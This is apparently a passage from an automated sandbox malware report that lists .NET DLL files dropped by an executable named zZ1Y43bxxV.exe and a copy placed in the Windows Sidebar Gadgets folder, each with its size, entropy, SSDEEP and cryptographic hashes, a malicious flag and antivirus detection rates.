                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):33792
                                                                                                                                                                  Entropy (8bit):5.541771649974822
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):64000
                                                                                                                                                                  Entropy (8bit):5.857602289000348
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):22016
                                                                                                                                                                  Entropy (8bit):5.41854385721431
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):342528
                                                                                                                                                                  Entropy (8bit):6.170134230759619
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):5.645950918301459
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):50176
                                                                                                                                                                  Entropy (8bit):5.723168999026349
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):24576
                                                                                                                                                                  Entropy (8bit):5.535426842040921
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                                                                                  MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                                                                                  SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                                                                                  SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                                                                                  SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40448
                                                                                                                                                                  Entropy (8bit):5.7028690200758465
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):39936
                                                                                                                                                                  Entropy (8bit):5.629584586954759
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):39936
                                                                                                                                                                  Entropy (8bit):5.629584586954759
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):38400
                                                                                                                                                                  Entropy (8bit):5.699005826018714
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                                                                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):39936
                                                                                                                                                                  Entropy (8bit):5.660491370279985
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                                                                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):39936
                                                                                                                                                                  Entropy (8bit):5.660491370279985
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                                                                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40448
                                                                                                                                                                  Entropy (8bit):5.7028690200758465
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36352
                                                                                                                                                                  Entropy (8bit):5.668291349855899
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):70144
                                                                                                                                                                  Entropy (8bit):5.909536568846014
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):22016
                                                                                                                                                                  Entropy (8bit):5.41854385721431
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):34304
                                                                                                                                                                  Entropy (8bit):5.618776214605176
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):33280
                                                                                                                                                                  Entropy (8bit):5.634433516692816
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):34816
                                                                                                                                                                  Entropy (8bit):5.636032516496583
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):34816
                                                                                                                                                                  Entropy (8bit):5.636032516496583
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):89600
                                                                                                                                                                  Entropy (8bit):5.905167202474779
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32256
                                                                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):5.645950918301459
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):33280
                                                                                                                                                                  Entropy (8bit):5.634433516692816
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
